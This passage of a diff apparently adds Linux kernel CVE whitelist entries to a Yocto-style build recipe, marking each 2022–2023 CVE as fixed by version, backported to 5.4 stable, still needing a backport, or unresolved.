+CVE_CHECK_WHITELIST += "CVE-2022-4662"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4696"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2022-4744"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47518"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47519"
+
+# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47521"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-47929"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47938"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47939"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47940"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47941"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47942"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47943"
+
+# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4842"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48423"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48424"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48425"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48502"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-48619"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-48626"
+
+# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
+
+# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-48629"
+
+# fixed-version: only affects 5.17 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48630"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2023-0030"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0045"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2023-0047"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0122"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-0160"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0179"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0210"
+
+# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0266"
+
+# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0394"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2023-0458"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2023-0459"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0461"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0468"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0469"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-0590"
+
+# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.223
+CVE_CHECK_WHITELIST += "CVE-2023-0615"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1032"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1073"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1074"
+
+# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1076"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1077"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1078"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1079"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2023-1095"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1118"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1192"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1193"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1194"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1195"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1206"
+
+# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1252"
+
+# CVE-2023-1281 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1295"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-1380"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2023-1382"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2023-1390"
+
+# CVE-2023-1476 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1513"
+
+# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1583"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1611"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2023-1637"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1652"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1670"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1829"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-1838"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1855"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2023-1859"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1872"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1989"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1990"
+
+# fixed-version: only affects 5.19rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1998"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2002"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2006"
+
+# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2023-2008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2019"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2023-20569"
+
+# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
+
+# cpe-stable-backport: Backported in 5.4.250
+CVE_CHECK_WHITELIST += "CVE-2023-20593"
+
+# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
+
+# CVE-2023-20937 has no known resolution
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-20938"
+
+# CVE-2023-20941 has no known resolution
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21102"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21106"
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-2124"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21255"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21264"
+
+# CVE-2023-21400 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2156"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-2162"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2163"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2166"
+
+# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2023-2177"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2194"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2235"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2236"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2248"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2269"
+
+# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22996"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22997"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22998"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22999"
+
+# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23001"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23002"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23003"
+
+# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23005"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2023-23006"
+
+# CVE-2023-23039 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23454"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23455"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-23559"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23586"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2430"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2483"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25012"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2513"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25775"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2598"
+
+# CVE-2023-26242 has no known resolution
+
+# CVE-2023-2640 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26544"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-26545"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26605"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26606"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2023-26607"
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2023-28327"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-28328"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28410"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28464"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-28466"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2023-2860"
+
+# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2023-28772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2898"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-2985"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3006"
+
+# Skipping CVE-2023-3022, no affected_versions
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-30456"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-30772"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3090"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2023-3106"
+
+# Skipping CVE-2023-3108, no affected_versions
+
+# CVE-2023-31081 has no known resolution
+
+# CVE-2023-31082 has no known resolution
+
+# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-31085"
+
+# cpe-stable-backport: Backported in 5.4.247
+CVE_CHECK_WHITELIST += "CVE-2023-3111"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3117"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-31248"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3141"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-31436"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2023-3159"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3161"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3212"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-3220"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-32233"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32247"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32248"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32250"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32252"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32254"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32257"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32258"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-32269"
+
+# CVE-2023-32629 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-3268"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3269"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3312"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3317"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-33203"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33250"
+
+# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3338"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3355"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3357"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-3358"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3359"
+
+# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3390"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33951"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33952"
+
+# CVE-2023-3397 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-34255"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-34256"
+
+# fixed-version: only affects 6.1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34319"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34324"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3439"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-35001"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3567"
+
+# CVE-2023-35693 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2023-35788"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35823"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35824"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35826"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-35827"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35828"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35829"
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3609"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3610"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3611"
+
+# CVE-2023-3640 has no known resolution
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-37453"
+
+# CVE-2023-37454 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-3772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3773"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3776"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3777"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2023-3812"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38409"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38426"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38427"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38428"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38429"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38430"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38431"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38432"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3863"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3865"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3866"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3867"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39189"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-39191"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39192"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39193"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-39194"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-39197"
+
+# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4004"
+
+# CVE-2023-4010 has no known resolution
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4015"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-40283"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-40791"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4128"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-4132"
+
+# CVE-2023-4133 needs backporting (fixed from 6.3)
+
+# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4147"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4155"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4194"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4206"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4207"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4208"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4244"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4273"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42752"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42753"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-42754"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42755"
+
+# fixed-version: only affects 6.4rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-42756"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2023-4385"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4387"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4389"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4394"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-44466"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4459"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4563"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4569"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-45862"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-45863"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-45871"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-45898"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4610"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4611"
+
+# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4623"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-46343"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46813"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-46838"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46862"
+
+# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4732"
+
+# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4921"
+
+# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5090"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-51042"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-51043"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5158"
+
+# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-5178"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51780"
+
+# cpe-stable-backport: Backported in 5.4.265
